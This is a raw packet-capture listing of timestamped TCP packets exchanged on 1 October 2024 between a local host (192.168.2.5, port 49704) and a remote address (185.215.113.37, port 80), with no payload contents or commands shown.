Oct 1, 2024 19:32:11.738615036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.738625050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.738635063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.738658905 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.738670111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.738679886 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.738687992 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.738718033 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.738732100 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.738742113 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.738751888 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.738769054 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.738794088 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.738831043 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.738841057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.738854885 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.738862991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.738867044 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.738873005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.738888979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.738895893 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.738944054 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.739031076 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739041090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739051104 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739070892 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.739084959 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.739397049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739408016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739418030 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739428043 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739437103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739445925 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.739447117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739458084 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739473104 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739475965 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.739485025 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739495039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739500999 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.739505053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739521027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739525080 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.739531040 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739536047 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.739541054 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739551067 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739558935 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739562988 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.739563942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739573956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739598036 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.739608049 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.739614010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739624023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739633083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739641905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739650965 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739653111 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.739686012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.739705086 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.739715099 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739725113 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739753962 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.739788055 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739798069 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739808083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739816904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739826918 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.739834070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739844084 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739850998 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.739854097 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739864111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739873886 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.739875078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739892960 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.739908934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739909887 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.739918947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739928961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739944935 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.739967108 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.739978075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.739989042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740016937 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.740024090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740032911 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740037918 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.740044117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740056992 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.740073919 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.740083933 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.740103006 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740113974 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740122080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740142107 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.740143061 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740154028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740159988 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.740179062 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.740191936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740199089 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.740200996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740210056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740225077 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.740238905 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.740257025 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.740288019 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740326881 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740326881 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.740336895 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740349054 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740359068 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740362883 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.740376949 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.740392923 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.740394115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740428925 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.740432024 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740442991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740466118 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.740484953 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.740515947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740525007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740535021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740545034 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740550041 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.740557909 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.740580082 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.740613937 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740623951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740633011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740652084 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.740672112 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.740709066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740719080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740730047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740740061 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740745068 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.740750074 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740768909 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.740890980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740901947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740911961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740921021 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.740921021 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.740921974 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740932941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740945101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740955114 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740955114 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.740966082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740978956 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.740988970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.740992069 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.741014957 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.741027117 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.862926960 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.862940073 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.862992048 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.863054037 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.863095045 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.863207102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.863215923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.863226891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.863238096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.863248110 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.863249063 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.863257885 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.863266945 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.863269091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.863315105 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.863315105 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.863332033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.863344908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.863354921 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.863364935 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.863373995 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.863414049 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.863428116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.863439083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.863447905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.863456964 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.863466978 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.863471031 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.863498926 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.863518000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.863523006 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.863528967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.863538027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.863548040 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.863557100 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.863559961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.863569975 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.863595963 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.863611937 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.863621950 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.863650084 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.863668919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.863675117 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.863678932 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.863689899 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.863706112 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.863724947 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.863744020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.863754988 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.863764048 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.863775015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.863781929 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.863917112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.863926888 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.863935947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.863944054 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.863945007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.863955975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.863957882 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.863965988 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.863976002 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.863981962 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.863986015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.863996983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.864005089 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.864006042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.864025116 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.864037037 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.864042997 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.864075899 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.864093065 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.864103079 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.864115000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.864130020 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.864140987 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.864160061 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.864161015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.864198923 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.864212990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.864223003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.864238977 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.864248037 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.864248991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.864259005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.864259958 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.864276886 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.864294052 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.864331961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.864341021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.864351034 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.864362001 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.864368916 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.864381075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.864392996 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.864423037 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.864449024 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.864459991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.864469051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.864496946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.864506006 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.864507914 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.864507914 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.864516973 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.864537954 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.864542961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.864552975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.864558935 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.864584923 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.864594936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.864633083 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.864646912 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.864656925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.864684105 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.864696980 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.864734888 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.864743948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.864753008 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.864763021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.864770889 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.864773035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.864783049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.864789009 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.864814997 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.864833117 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.864860058 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.864871025 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.864900112 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.864917994 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.864918947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.864928961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.864938021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.864958048 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.864976883 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.864993095 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.865004063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.865012884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.865035057 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.865051031 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.865087032 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.865098000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.865108013 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.865124941 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.865140915 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.865154982 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.865166903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.865178108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.865185976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.865195990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.865209103 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.865232944 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.865245104 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.865253925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.865258932 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.865300894 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.865324020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.865354061 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.865364075 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.865372896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.865400076 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.865412951 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.865453959 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.865463018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.865473032 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.865483999 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.865492105 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.865506887 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.865520954 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.865546942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.865556955 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.865565062 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.865576029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.865586996 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.865612030 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.865639925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.865648985 CEST	80	49704	185.215.113.37	192.168.2.5
